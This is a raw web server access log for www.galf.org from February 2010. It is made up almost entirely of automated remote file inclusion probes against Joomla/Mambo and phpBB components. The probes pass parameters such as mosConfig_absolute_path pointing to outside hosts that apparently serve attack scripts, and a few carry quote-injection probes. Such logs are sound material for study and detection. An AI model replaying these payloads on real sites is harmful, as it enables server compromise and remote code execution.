77.221.130.15 - - [14/Feb/2010:22:53:24 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:53:28 -0800] "GET /logs/access_090824.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:53:43 -0800] "GET /logs/access_090727.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:53:45 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:53:45 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:53:45 -0800] "GET /logs/access.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:54:00 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:54:00 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:54:00 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:22:56:00 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:22:56:04 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:22:56:04 -0800] "GET /logs/access_100118.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:22:56:17 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:22:56:17 -0800] "GET /logs/access_100118.log//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:22:56:17 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [14/Feb/2010:22:59:49 -0800] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
213.239.230.130 - - [14/Feb/2010:22:59:49 -0800] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:00:22 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:01:03 -0800] "GET /logs/access_091019.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:01:24 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:01:33 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:01:33 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:01:33 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:01:33 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:01:38 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:01:38 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:01:38 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:01:38 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:02:35 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:02:40 -0800] "GET /logs/access_090720.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:02:40 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:02:45 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:02:45 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:02:45 -0800] "GET /logs/access_090720.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:02:50 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:02:50 -0800] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:02:50 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:03:26 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:03:26 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:23:03:26 -0800] "GET /logs/access_090720.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:03:30 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.6.218.57 - - [14/Feb/2010:23:03:30 -0800] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.6.218.57 - - [14/Feb/2010:23:03:30 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.6.218.57 - - [14/Feb/2010:23:03:33 -0800] "GET /logs/access_100201.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:03:37 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:03:39 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:04:04 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:04:05 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:23:04:16 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:23:04:23 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:23:04:23 -0800] "GET /logs/access_100118.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:23:04:40 -0800] "GET /logs/access_100118.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:23:04:40 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:23:04:40 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:04:43 -0800] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:05:37 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:05:48 -0800] "GET /skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:05:48 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:05:48 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:06:30 -0800] "GET /logs/access_090720.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:23:07:12 -0800] "GET /logs/access_091019.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:23:07:57 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/Imag=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:23:07:57 -0800] "GET /components/com_htmlarea3_xtd-c/popups/Imag=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:23:07:57 -0800] "GET /logs/access_090720.log//components/com_htmlarea3_xtd-c/popups/Imag=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:25 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:25 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:25 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:26 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:26 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:26 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:28 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:28 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:28 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:29 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:29 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:29 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:29 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:29 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:29 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:30 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:30 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:30 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:30 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:30 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:30 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:39 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:39 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:39 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:41 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:41 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:41 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:47 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:47 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:47 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:57 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:57 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:23:08:57 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [14/Feb/2010:23:10:39 -0800] "GET /common/db.php?commonpath=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.55.207.30 - - [14/Feb/2010:23:11:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:12:10 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:12:10 -0800] "GET //bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:12:10 -0800] "GET /logs/access_100201.log%20%20///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:23:15:18 -0800] "GET /logs/access_090817.log/?mosConfig_absolute_path=' HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:23:15:18 -0800] "GET /?mosConfig_absolute_path=' HTTP/1.1" 200 1048 "-" "libwww-perl/5.76" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:23:15:19 -0800] "GET /logs/?mosConfig_absolute_path=' HTTP/1.1" 200 4942 "-" "libwww-perl/5.76" "www.galf.org"
208.80.193.38 - - [14/Feb/2010:23:18:13 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; freenet DSL 1.1; .NET CLR 1.0.3705; Media Center PC 2.8)" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:18:23 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:18:23 -0800] "GET /logs/access_091130.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:18:41 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:18:41 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
